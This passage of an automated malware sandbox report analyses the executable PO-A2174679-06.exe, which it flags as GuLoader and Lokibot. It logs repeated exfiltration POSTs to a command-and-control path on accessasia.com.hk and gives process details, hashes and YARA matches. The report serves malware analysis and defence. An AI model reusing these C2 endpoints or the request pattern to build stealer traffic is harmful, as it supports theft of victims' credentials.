                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:29.983164072 CET5365INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:29 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            30192.168.2.549770192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:55.479697943 CET6029OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:55.832416058 CET6034INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:55 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            31192.168.2.549771192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:56.264238119 CET6035OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:56.637950897 CET6035INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:56 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            32192.168.2.549772192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:57.090883970 CET6036OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:57.455832958 CET6037INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:57 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            33192.168.2.549773192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:57.912353039 CET6038OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:58.269815922 CET6038INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:58 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            34192.168.2.549774192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:58.700265884 CET6039OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:59.063069105 CET6040INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:58 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            35192.168.2.549775192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:59.551681042 CET6041OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:59.925751925 CET6041INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:59 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            36192.168.2.549776192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:50:00.379571915 CET6042OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:00.736491919 CET6043INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:00 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            37192.168.2.549777192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:50:01.225791931 CET6044OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:01.773279905 CET6044INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:01 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            38192.168.2.549778192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:50:02.942234039 CET6045OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:03.318948984 CET6046INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:03 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            39192.168.2.549779192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:50:04.328154087 CET6047OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:04.715640068 CET6047INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:04 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            4192.168.2.549736192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:31.069634914 CET5366OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:31.424293995 CET5367INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:31 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            40192.168.2.549780192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:50:05.623106956 CET6048OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:50:05.984535933 CET6049INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:50:05 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            5192.168.2.549737192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:31.953352928 CET5367OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:32.325089931 CET5368INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:32 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            6192.168.2.549738192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:32.896542072 CET5369OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:33.251894951 CET5369INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:32 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            7192.168.2.549739192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:33.755837917 CET5370OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:34.109647989 CET5371INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:33 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            8192.168.2.549740192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:34.630259037 CET5372OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:34.981544971 CET5372INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:34 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            9192.168.2.549741192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:35.508750916 CET5373OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:35.876161098 CET5382INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:35 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Code Manipulations

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            Analysis Process: PO-A2174679-06.exe PID: 6600 Parent PID: 5696

                            General

                            Start time:08:47:58
                            Start date:23/02/2021
                            Path:C:\Users\user\Desktop\PO-A2174679-06.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\user\Desktop\PO-A2174679-06.exe'
                            Imagebase:0x400000
                            File size:86016 bytes
                            MD5 hash:FDEC289FB4626DD56BBB55770AE5F432
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Visual Basic
                            Reputation:low

                            Analysis Process: PO-A2174679-06.exe PID: 5424 Parent PID: 6600

                            General

                            Start time:08:48:51
                            Start date:23/02/2021
                            Path:C:\Users\user\Desktop\PO-A2174679-06.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\user\Desktop\PO-A2174679-06.exe'
                            Imagebase:0x400000
                            File size:86016 bytes
                            MD5 hash:FDEC289FB4626DD56BBB55770AE5F432
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, Author: Joe Security
                            Reputation:low

                            Disassembly

                            Code Analysis

                            Reset < >